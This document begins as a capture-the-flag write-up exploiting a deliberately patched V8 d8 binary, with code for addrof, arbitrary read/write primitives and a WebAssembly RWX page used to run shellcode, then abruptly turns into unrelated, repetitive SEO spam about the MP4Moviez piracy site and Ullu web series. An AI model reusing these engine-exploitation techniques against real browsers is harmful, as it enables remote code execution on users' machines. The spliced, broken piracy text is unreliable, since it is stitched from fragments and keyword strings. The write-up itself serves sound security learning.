Gotta go fast. server.py patch.txt
We are given the server.py python script, a d8 executeable and source code with a custom patch. I included the files directly relevant to the writeup above.
Looking at the provided patch, a very obvious vulnerability was introduced into v8. The patch adds a function called setHorsepower that allows us to set the length field of JSArray objects to a value of our chosing. The screenshot below showcases the relevant parts of the patch.
With this added vulnerability we can get an out of bounds read and write as showcased below. We start off by creating a JSArray object of type FixedDoubleArray. Next we use the setHorsepower function to increase its length to 0x100. We can now access out of bounds memory and both read and overwrite values stored on the v8-heap. We will now proceed to leverage this bug to take control of v8 and gain arbitrary code execution.
As you can see in the above screenshot, accessing arr[50] returned a float number due to the type of our array. Float numbers such as these are hard to interpret and use especially since they are oftentimes actually addresses that we would much rather view in hex. To accomplish this we will start by adding 2 helper functions.
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u32_buf = new Uint32Array(buf);
function ftoi(val) {
f64_buf[0] = val;
return BigInt(u32_buf[0]) + (BigInt(u32_buf[1]) << 32n);
}
function itof(val) {
u32_buf[0] = Number(val & 0xffffffffn);
u32_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
The first helper function, ftoi, takes a value of type float and converts it to a BigInt value. The second helper function, itof, accepts a BigInt value as its argument and converts it to a float. This function will be important when trying to write values into memory.
Now that that is setup, our first goal will be to craft an addrof primitive. This primitive should allow us to pass in an arbitrary object and the function should return its address. We will accomplish this using our vulnerability.
var s = [1.1,2.2];
var obj = {"A":1};
var obj_arr = [obj];
var fl_arr = [3.3,4.4];
var tmp = new Uint8Array(8);
s.setHorsepower(0x100);
let obj_arr_elem = s[12];
function addrof(obj) {
obj_arr[0] = obj;
s[17] = obj_arr_elem;
return ftoi(fl_arr[0]) & 0xffffffffn;
}
We start by creating some objects, and using the vulnerable function to extend the length of our float array s. By accessing various indexes of the s array we can now read and overwrite arbitrary values stored after the s array. Our first step is to retrieve the elements pointer of our obj_arr. This will become vital for the upcoming addrof primitive.
For the addrof function, we start by setting the first index of our obj_arr to the value address we are trying to leak. Next we use our vulnerability to overwrite the elements pointer of fl_arr with the elements pointer of our object array. This makes it so fl_arr[0] now points to the address we just stored in the obj_arr. Finally we use ftoi to return the value with type BigInt. Like this we successfuly managed to create a primitive that allows us to retrieve the addresses of our objects.
As you may have spotted in the above screenshot, we did not in fact leak the entire address of the passed in object. We only got the lower 4 bytes. This is due to a v8 concept called pointer compression. To save space, only the lower 4 bytes of addresses are stored on the v8 heap. Since the upper 4 bytes are always the same throughout a specific v8 process, this address is instead stored in the r13 register. We will need to find a way to leak this value too if we want to successfuly leak object addresses.
In the beginning of our exploit we executed 'var tmp = new Uint8Array(8);' to allocate a specific object. As it turns out, this object actually stores the root address in memory, so we can simply leak it by accessing s[32];
We now have everything needed to proceed with our next primitives. To be more specific, we want an arbitrary read and write. There are multiple ways to achieve this, but I decided to accomplish this primitive via a pair of ArrayBuffers.
function arb_read(obj,offset) {
dv_1.setUint32(0, Number(addrof(obj)-1n+offset), true);
return dv_2.getUint32(0, true);
}
function arb_write(addr,val) {
w[21] = itof(BigInt(part_2)>>32n);
dv_1.setUint32(0, Number(addr), true);
dv_2.setUint32(0, val, true);
}
var w = [1.1,2.2];
w.setHorsepower(0x100);
var arr_1 = new ArrayBuffer(0x40);
var dv_1 = new DataView(arr_1);
var arr_2 = new ArrayBuffer(0x40);
var dv_2 = new DataView(arr_2);
w[6] = itof((addrof(arr_2)+0x10n + 3n)<<32n);
w[7] = itof(BigInt(root_leak)>>32n);
w[21] = itof(BigInt(root_leak)>>32n);
Once again we start by allocating an arr w and extend its length using the vulnerable function to achieve an index read/write. Next we allocate 2 arraybuffers and their dataview objects.
In JSArrayBuffer objects, the backing store points to their elements. These elements can then be viewed and edited using the getUint32() and setUint32() functions. This means that if we overwrite the backing store pointer of arr_1 with the address of the backing store pointer of arr_2, we can execute 'dv_1.setUint32(addrof(obj));' to write an arbitrary address to the backing store pointer of arr_2. We can now use dv_2.(get/set) to complete our arbitrary read and write primitives by using the pointer received from arr_1.
We now have all of our primitives together. The last thing needed is a way to obtain code execution. With our primitives, the easiest way to achieve this is through shellcode and webassembly.
let wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,...]);
let wasm_module = new WebAssembly.Module(wasm_code);
let wasm_instance = new WebAssembly.Instance(wasm_module);
let pwn = wasm_instance.exports.main;
When creating a wasm function as demonstrated above, a RWX page is created in memory. This address is then stored at wasm_instance + 0x68.
To complete our exploit, we start by leaking the address of the rwx page using our arb_read() function on wasm_instance + 0x68. Next we call copy_shellcode() to copy our shellcode over to this page step by step using arb_write(). Finally we execute the '/bin/cat ./flag.txt' shellcode to retrieve the flag and complete the challenge.
The full exploit script is posted below.
and ransomware, often hidden within movie files or pop-up ads. Data Theft
Websites like mp4moviez are illegal distribution platforms that host copyrighted material without the permission of the original creators. These sites constantly change their domain extensions (such as .in, .cc, .xyz, or .org) to evade law enforcement and internet service provider (ISP) blocks.
is one of several third-party, piracy-driven websites that make headlines for hosting, streaming, and providing direct, free downloads of popular movies and web series. These platforms often list content from mainstream OTT apps like Ullu, Netflix, and Amazon Prime.
Sites like MP4Moviez are part of a large piracy network that illegally provides free downloads of movies and web series, including content from platforms like Ullu. These websites are known for leaking newly released content across various languages and formats, often offering different quality options like 480p, 720p, or 1080p. They use strategies like frequently changing their domain names to evade legal blocks and continuing their operations.
The entertainment industry relies on subscription revenue and box office returns to pay its staff. When content is pirated, the financial loss cascades down the production ladder. Independent directors, crew members, editors, and actors lose out on residual income and future project funding because the producing studio cannot realize a return on its investment. Safe and Legal Alternatives for Streaming Content free ullu web series download mp4moviez upd
Illegal streaming sites rarely rely on standard ad networks. Instead, they use aggressive advertising tactics, including:
Piracy platforms are notorious vectors for cyber threats. Clicking a "Download" button on these sites rarely triggers an immediate video download. Instead, it often initiates background scripts that install unwanted software, adware, spyware, or ransomware onto the user's device. This software can steal sensitive personal data, track browsing habits, or log banking credentials. 2. Intrusive and Explicit Advertising
The Rise of Digital Streaming and the Risks of Piracy Sites like MP4Moviez
Ullu is a popular Indian web series platform that offers a vast library of original content. The platform was launched in 2018 and has since become a household name, thanks to its engaging and often bold content. Ullu web series are known for their unique storylines, crisp production values, and talented cast. The platform offers a wide range of web series across various genres, including drama, comedy, romance, horror, and more. and ransomware, often hidden within movie files or
The digital entertainment landscape in India has grown exponentially, with platforms like delivering a distinct mix of dramas, thrillers, and web series that cater to a wide audience. For those looking for free Ullu web series download options via Mp4Moviez , keeping up with the latest updates is crucial.
With the official app blocked in India, a significant number of Ullu's over 2.7 million paying subscribers have been left in a lurch, without access to content they had legitimately paid for. This vacuum has, predictably, led to a surge in searches for content through unofficial channels.
In recent years, the Indian web series landscape has witnessed a significant surge in popularity, with Ullu being one of the prominent players in this space. Ullu, a popular Indian web series platform, has been entertaining audiences with its engaging and often provocative content. The platform offers a wide range of web series across various genres, including drama, comedy, romance, and more. However, accessing Ullu web series can be a challenge for some users, especially those who are looking for free downloads. In this article, we'll explore the world of Ullu web series, discuss the MP4Moviez updates, and provide a comprehensive guide on how to download free Ullu web series in MP4 format.
Many mobile network operators regularly partner with premium streaming applications. Check your current mobile or broadband data provider; many monthly recharge plans include complimentary or deeply discounted access to various regional streaming platforms as part of their service bundles. 3. Mainstream Streaming Aggregators is one of several third-party, piracy-driven websites that
This is the most immediate and personal risk you face. Piracy websites like MP4Moviez operate on a business model fueled by aggressive, often malicious, advertising networks. Clicking a single link on the site can expose you to severe cyber threats.
Pirated files are frequently heavily compressed, resulting in poor audio synchronization, low resolution, and missing scenes. Safe and Legal Alternatives
MP4Moviez is a legend in the piracy underworld. It is not a static site; it is a hydra. Authorities block one domain, and the operators spin up three mirrors. The addition of (update) in the search query is the user's attempt to bypass dead links.